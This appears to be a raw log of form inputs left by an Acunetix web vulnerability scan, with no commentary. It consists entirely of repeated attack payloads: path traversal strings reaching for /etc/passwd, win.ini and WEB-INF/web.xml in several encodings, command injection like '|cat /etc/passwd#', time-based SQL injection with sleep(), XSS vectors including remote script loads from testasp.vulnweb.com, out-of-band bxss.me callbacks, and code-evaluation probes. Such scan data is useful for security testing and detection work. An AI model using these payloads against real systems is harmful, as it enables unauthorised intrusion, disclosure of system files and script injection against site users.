WEB-INF/web.xml

1

cat /etc/passwd

1

1<ScRiPt >prompt(917239)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

1

1

WEB-INF\web.xml

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984474></ScRiPt>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<ScRiPt >prompt(905457)</ScRiPt>

1

1

|cat /etc/passwd#

1<video><source onerror="javascript:prompt(916118)">

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100496+100078}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957675)"></g></svg>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

-1

)

1

1&n937423=v990840

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1<div style=width:expression(prompt(942145))>

/etc/passwd

-1))

!(()&&!|*|*|

"|"ld

1

1

1<iframe src='data:text/html

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

YpDn4ep7'

'"()

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

1<body onload=prompt(917081)>

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

SC4bJHEt')

testasp.vulnweb.com

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994206)>

1

1

1

2Yej9oR6'))

'

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(973618)>

1

"

1

-1

1

1

http://hitDODpolkHj6.bxss.me/

1<img/src=">" onerror=alert(900477)>

1

1

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

-1)

file:///etc/passwd

1

1<ScRiPt%20>prompt(965907)</sCripT>

1

1

1

comments

1&lt

/\../\../\../\../\../\../\../etc/passwd

&dir

-1))

1

1

comments

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

WEB-INF/web.xml

LtXSfXMu'

\xf6<img acu onmouseover=prompt(958005) //\xf6>

'"

1

1

1

comments/.

<!--

1<input autofocus onfocus=prompt(929748)>

WEB-INF\web.xml

"&dir&"

gRFb4Plu')

1

1

1

1'"()&%<ScRiPt >prompt(956258)</ScRiPt>

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini

rSpsy3du'))

|dir

[url=http://www.acunetix.com]website security[/url]

1

'"()&%<ScRiPt >prompt(921373)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1_954431

1_GBfmV <ScRiPt >prompt(980326)</ScRiPt>

'|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

response.write(9934974*9331672)

1

WEB-INF/web.xml

'+response.write(9934974*9331672)+'

acu9246\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9246

"+response.write(9934974*9331672)+"

1

1

1

1

acux4148\xc0\xbez1\xc0\xbcz2a\x90bcxuca4148

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(989532)</ScRiPt>

&cat /etc/passwd&

1

1

1<script>prompt(963323)</script>

1

1

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt >prompt(902319)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979579></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(948751)</ScRiPt>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1<video><source onerror="javascript:prompt(940247)">

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

|cat /etc/passwd#

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965590)"></g></svg>

1

-1

1

1

1<div style=width:expression(prompt(992463))>

1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99331+99180}

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<iframe src='data:text/html

1&n939160=v949258

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

1<body onload=prompt(904073)>

-1))

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

nbSoWt9p'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909532)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

nk7doPKz')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

!(()&&!|*|*|

'

testasp.vulnweb.com

1<img src=xyz OnErRor=prompt(912932)>

UW8ll6rh'))

'

^(#$!@#$)(()))******

1

1

/etc/passwd

"

-1

1<img/src=">" onerror=alert(975768)>

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

-1)

1<ScRiPt%20>prompt(901051)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitknHrIAoO90.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

1

-1))

acunetix_wvs_invalid_filename

1&lt

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

&dir

dVzmpneB'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

http://www.acunetix.tst

1

80fVLoVt')

\xf6<img acu onmouseover=prompt(943346) //\xf6>

1

'&dir&'

comments/.

1

1

'"

1'"()&%<ScRiPt >prompt(930456)</ScRiPt>

1<input autofocus onfocus=prompt(979892)>

ARWNxf3y'))

1

"&dir&"

'"()&%<ScRiPt >prompt(947510)</ScRiPt>

<!--

1

file:///etc/passwd

1

1

|dir

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

/\../\../\../\../\../\../\../etc/passwd

1_963022

[url=http://www.acunetix.com]website security[/url]

1

'|dir

1

1_FcZlO <ScRiPt >prompt(968790)</ScRiPt>

1

WEB-INF/web.xml

"|dir

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9152932*9925848)

1

1

1

'+response.write(9152932*9925848)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu5010\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5010

"+response.write(9152932*9925848)+"

1

acux8755\xc0\xbez1\xc0\xbcz2a\x90bcxuca8755

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(995673)</ScRiPt>

&cat /etc/passwd&

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<script>prompt(965824)</script>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1<ScRiPt >prompt(928903)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

${99932+99345}

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935826></ScRiPt>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1<ScRiPt >prompt(907325)</ScRiPt>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n908409=v920101

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1<video><source onerror="javascript:prompt(905187)">

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

1

)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993838)"></g></svg>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1

'|'ld

^(#$!@#$)(()))******

testasp.vulnweb.com

-1))

1

1<div style=width:expression(prompt(969064))>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<iframe src='data:text/html

'"()

QvylvM4m'

1

1

1

'

1<body onload=prompt(916531)>

1

Se1yZ3YM')

/etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952014)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

'

1

mawdq3fU'))

1

1<img src=xyz OnErRor=prompt(927311)>

http://hittpfaruNiBX.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1<img/src=">" onerror=alert(913705)>

-1

acunetix_wvs_invalid_filename

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

1<ScRiPt%20>prompt(930364)</sCripT>

1

comments

-1)

http://www.acunetix.tst

1&lt

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

1

-1))

comments

'"

1

'&dir&'

1

1'"()&%<ScRiPt >prompt(996978)</ScRiPt>

\xf6<img acu onmouseover=prompt(917849) //\xf6>

hotvZB0P'

<!--

1

comments/.

1

1

1<input autofocus onfocus=prompt(921741)>

lVIRz1Xt')

"&dir&"

'"()&%<ScRiPt >prompt(907803)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

1

file:///etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

JP9u50vD'))

|dir

1_912208

1

/\../\../\../\../\../\../\../etc/passwd

1

1_kABdG <ScRiPt >prompt(903094)</ScRiPt>

'|dir

1

1

1

"|dir

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu3269\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3269

1

................windowswin.ini

1

acux2609\xc0\xbez1\xc0\xbcz2a\x90bcxuca2609

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(980189)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(901143)</script>

response.write(9932624*9186475)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

'+response.write(9932624*9186475)+'

1<ScRiPt >prompt(997133)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1

"+response.write(9932624*9186475)+"

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983090></ScRiPt>

1

1

'&cat /etc/passwd&'

1

1<ScRiPt >prompt(934927)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(980960)">

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(930727)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(923789))>

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1

1<iframe src='data:text/html

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

${100367+99025}

1<body onload=prompt(925739)>

-1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946859)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n980547=v983432

1

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=xyz OnErRor=prompt(999461)>

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

1<img/src=">" onerror=alert(998500)>

lzGZuue2'

1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<ScRiPt%20>prompt(932901)</sCripT>

^(#$!@#$)(()))******

testasp.vulnweb.com

cIs2VG3H')

1

1

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

1

wMP43z9k'))

1

1

'

/etc/passwd

\xf6<img acu onmouseover=prompt(928448) //\xf6>

1

1

"

acunetix_wvs_invalid_filename

"

1

1

-1

1<input autofocus onfocus=prompt(956091)>

1

${@print(md5(acunetix_wvs_security_test))}

comments

http://hitcc1C44qldG.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1)

||cat /etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1))

1_PDCLt <ScRiPt >prompt(924426)</ScRiPt>

1

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

&dir

1

1

MiFngtd9'

1

1

'"

1

1

1

1

oSiAe83p')

1'"()&%<ScRiPt >prompt(948933)</ScRiPt>

1

1

<!--

1

fEoB1cqC'))

1

'&dir&'

file:///etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(996633)</ScRiPt>

1

1

1

1

"&dir&"

1_904224

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

'|dir

WEB-INF/web.xml

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu8103\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8103

1

response.write(9386991*9463789)

................windowswin.ini

acux9166\xc0\xbez1\xc0\xbcz2a\x90bcxuca9166

'+response.write(9386991*9463789)+'

1

1

1<ScRiPt >prompt(963952)</ScRiPt>

1

1

"+response.write(9386991*9463789)+"

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(942960)</script>

1

1

1

&cat /etc/passwd&

1<ScRiPt >prompt(928317)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?966254></ScRiPt>

'&cat /etc/passwd&'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd

1<ScRiPt >prompt(959795)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<video><source onerror="javascript:prompt(989776)">

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980445)"></g></svg>

cat /etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<div style=width:expression(prompt(920947))>

1

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

1

1

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

-1

1

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n944405=v939832

1<body onload=prompt(931910)>

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99609+99090}

WEB-INF\web.xml

'|'ld

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905632)>

-1))

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(981528)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

c5CnARk3'

"|"ld

1<img/src=">" onerror=alert(977411)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

1<ScRiPt%20>prompt(932694)</sCripT>

'"()

q0WDTFaS')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

testasp.vulnweb.com

1

1&lt

"

Rt8ISm8k'))

1

/etc/passwd

1

'

\xf6<img acu onmouseover=prompt(983117) //\xf6>

1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(912140)>

1

1

1

-1)

1

||cat /etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

&dir

1

acunetix_wvs_invalid_filename

1

1

http://hitnGdk3c2f3T.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

o1hdCJz5'

[url=http://www.acunetix.com]website security[/url]

1

1

1

comments

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1_Se9yT <ScRiPt >prompt(924540)</ScRiPt>

BuA7zdqQ')

1

"&dir&"

comments

1

http://www.acunetix.tst

'"

1

oLn4G0pV'))

1

file:///etc/passwd

1

comments/.

<!--

1'"()&%<ScRiPt >prompt(954803)</ScRiPt>

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(984941)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

1_905828

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

response.write(9140890*9622933)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

'+response.write(9140890*9622933)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9140890*9622933)+"

acu8708\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8708

1

1

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'&cat /etc/passwd&'

acux3201\xc0\xbez1\xc0\xbcz2a\x90bcxuca3201

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<ScRiPt >prompt(900240)</ScRiPt>

1

1

1

1

1

1

1

1

cat /etc/passwd

1<script>prompt(974116)</script>

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

1

1

WEB-INF\web.xml

1<ScRiPt >prompt(917058)</ScRiPt>

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941549></ScRiPt>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

${100067+99384}

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt >prompt(923015)</ScRiPt>

1&n967281=v934663

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

1<video><source onerror="javascript:prompt(975437)">

1some_inexistent_file_with_long_name%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(968875)"></g></svg>

-1)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1<div style=width:expression(prompt(967496))>

testasp.vulnweb.com

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

'"()

^(#$!@#$)(()))******

DYmdqPSr'

1

1

1<iframe src='data:text/html

7aHxUBdh')

1

'

/etc/passwd

1

1

"

1

1<body onload=prompt(953181)>

1

6I5RCDQu'))

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946182)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitH9xDoel8o4.bxss.me/

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1<img src=xyz OnErRor=prompt(916622)>

-1)

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

-1))

1<img/src=">" onerror=alert(923966)>

comments

1

1

http://www.acunetix.tst

1

comments

1<ScRiPt%20>prompt(980965)</sCripT>

d1wrJBj9'

'"

1'"()&%<ScRiPt >prompt(984706)</ScRiPt>

file:///etc/passwd

1

1

"&dir&"

comments/.

'"()&%<ScRiPt >prompt(905959)</ScRiPt>

<!--

thyNai6j')

1&lt

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

\xf6<img acu onmouseover=prompt(948018) //\xf6>

DN5WAxGh'))

1

1_903624

1<input autofocus onfocus=prompt(948865)>

WEB-INF/web.xml

1

1

1

1

1

'|dir

<a href='http://www.acunetix.com'>website security</a>

1

1

WEB-INF\web.xml

[url=http://www.acunetix.com]website security[/url]

1

"|dir

1_EkXyt <ScRiPt >prompt(966605)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

1

acu1222\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1222

..\..\..\..\..\..\..\..\windows\win.ini

acux10354\xc0\xbez1\xc0\xbcz2a\x90bcxuca10354